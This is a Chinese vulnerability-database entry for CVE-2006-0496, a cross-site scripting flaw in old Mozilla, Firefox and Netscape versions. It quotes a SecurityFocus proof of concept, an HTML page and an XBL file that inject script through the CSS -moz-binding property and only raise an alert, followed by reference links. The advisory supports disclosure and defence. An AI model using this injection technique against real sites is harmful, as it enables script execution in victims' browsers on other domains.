Mozilla Firefox XBL -MOZ-BINDING属性跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109685 漏洞类型 跨站脚本
发布时间 2006-01-30 更新时间 2006-04-28
CVE编号 CVE-2006-0496 CNNVD-ID CNNVD-200601-377
漏洞平台 Linux CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/27150
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-377
|漏洞详情
Mozilla1.7.12及更早版本,MozillaFirefox1.0.7及更早版本,以及Netscape8.1及更早版本中存在跨站脚本攻击漏洞。远程攻击者可通过不要求样式表与Web页面具有相同的起源的-moz-bindingCSS(级联样式表)属性注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/16427/info

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.


This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information. 

http://domain1/path/to/page.html :

<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>

</bindings>
|参考资料

来源:bugzilla.mozilla.org
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=324253
来源:XF
名称:mozilla-mozbinding-xss(24427)
链接:http://xforce.iss.net/xforce/xfdb/24427
来源:BID
名称:16427
链接:http://www.securityfocus.com/bid/16427
来源:OSVDB
名称:22924
链接:http://www.osvdb.org/22924
来源:VUPEN
名称:ADV-2006-0403
链接:http://www.frsirt.com/english/advisories/2006/0403
来源:MISC
链接:http://www.davidpashley.com/cgi/pyblosxom.cgi/computing/livejournal-mozilla-bug.html
来源:SECTRACK
名称:1015563
链接:http://securitytracker.com/id?1015563
来源:SECTRACK
名称:1015553
链接:http://securitytracker.com/id?1015553
来源:FULLDISC
名称:20060128-moz-bindingCSSproperty:moreXSSfun
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=113847912709062&w=2
来源:MISC
链接:http://community.livejournal.com/lj_dev/708069.html